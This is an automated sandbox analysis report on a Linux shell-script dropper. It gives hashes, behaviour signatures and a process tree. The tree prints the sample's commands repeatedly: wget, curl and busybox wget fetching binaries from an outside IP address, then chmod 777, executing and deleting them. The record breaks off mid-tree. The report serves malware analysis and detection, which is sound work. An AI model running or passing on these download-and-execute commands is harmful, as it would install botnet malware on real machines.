Analysis
-
max time kernel
46s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
-
Size
10KB
-
MD5
c3a67442db56ee6d5718cb9b8748a2a7
-
SHA1
7439efa913e1f900f72ff80e1a271b84fe407877
-
SHA256
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813
-
SHA512
ee896800093e9a5525f3110d7dbb4a475f534a1c1277c266f4f35ef58d6578e346eff768abda3f17514bbfd1ee925002de937c6bc213a20d18912936e415db73
-
SSDEEP
192:0PXUAsXN4PcoJwIYVV7OyGe4qS5pcoJwIhyGe4qS9QPXUAsXq:0PXUDXN4PcoJwIYVV7OyGBqS5pcoJwIA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1610 chmod 1646 chmod 1652 chmod 1566 chmod 1506 chmod 1518 chmod 1554 chmod 1560 chmod 1598 chmod 1622 chmod 1548 chmod 1530 chmod 1616 chmod 1640 chmod 1658 chmod 1664 chmod 1670 chmod 1542 chmod 1590 chmod 1604 chmod 1524 chmod 1584 chmod 1628 chmod 1512 chmod 1536 chmod 1634 chmod 1572 chmod 1578 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a 1507 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux 1513 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC 1519 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e 1525 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp 1531 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg 1537 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq 1543 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z 1549 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 1555 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA 1561 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq 1567 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT 1573 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz 1579 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE 1585 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq 1591 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z 1599 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp 1605 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg 1611 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz 1617 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE 1623 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 1629 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA 1635 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq 1641 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT 1647 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a 1653 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e 1659 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux 1665 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC 1671 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq curl File opened for modification /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg curl File opened for modification /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA curl File opened for modification /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz curl File opened for modification /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux curl File opened for modification /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux curl File opened for modification /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE curl File opened for modification /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a curl File opened for modification /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e curl File opened for modification /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz curl File opened for modification /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA curl File opened for modification /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT curl File opened for modification /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e curl File opened for modification /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq curl File opened for modification /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT curl File opened for modification /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp curl File opened for modification /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 curl File opened for modification /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a curl File opened for modification /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg curl File opened for modification /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 curl File opened for modification /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq curl File opened for modification /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC curl File opened for modification /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC curl File opened for modification /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp curl File opened for modification /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z curl File opened for modification /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE curl File opened for modification /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z curl File opened for modification /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq curl
Processes
-
/tmp/19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh/tmp/19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh1⤵PID:1497
-
/bin/rm/bin/rm bins.sh2⤵PID:1498
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1499
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Writes file to tmp directory
PID:1500
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1504
-
-
/bin/chmodchmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Executes dropped EXE
PID:1507
-
-
/bin/rmrm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1508
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1511
-
-
/bin/chmodchmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Executes dropped EXE
PID:1513
-
-
/bin/rmrm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1514
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1517
-
-
/bin/chmodchmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Executes dropped EXE
PID:1519
-
-
/bin/rmrm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1520
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1521
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1523
-
-
/bin/chmodchmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1529
-
-
/bin/chmodchmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1532
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1533
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1535
-
-
/bin/chmodchmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1538
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1541
-
-
/bin/chmodchmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1544
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1547
-
-
/bin/chmodchmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1550
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1551
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1553
-
-
/bin/chmodchmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1556
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1559
-
-
/bin/chmodchmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1562
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1565
-
-
/bin/chmodchmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1568
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1571
-
-
/bin/chmodchmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1574
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1577
-
-
/bin/chmodchmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1580
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1583
-
-
/bin/chmodchmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1586
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1589
-
-
/bin/chmodchmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:1592
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1597
-
-
/bin/chmodchmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1603
-
-
/bin/chmodchmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1609
-
-
/bin/chmodchmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1615
-
-
/bin/chmodchmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1621
-
-
/bin/chmodchmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1627
-
-
/bin/chmodchmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1633
-
-
/bin/chmodchmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1639
-
-
/bin/chmodchmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
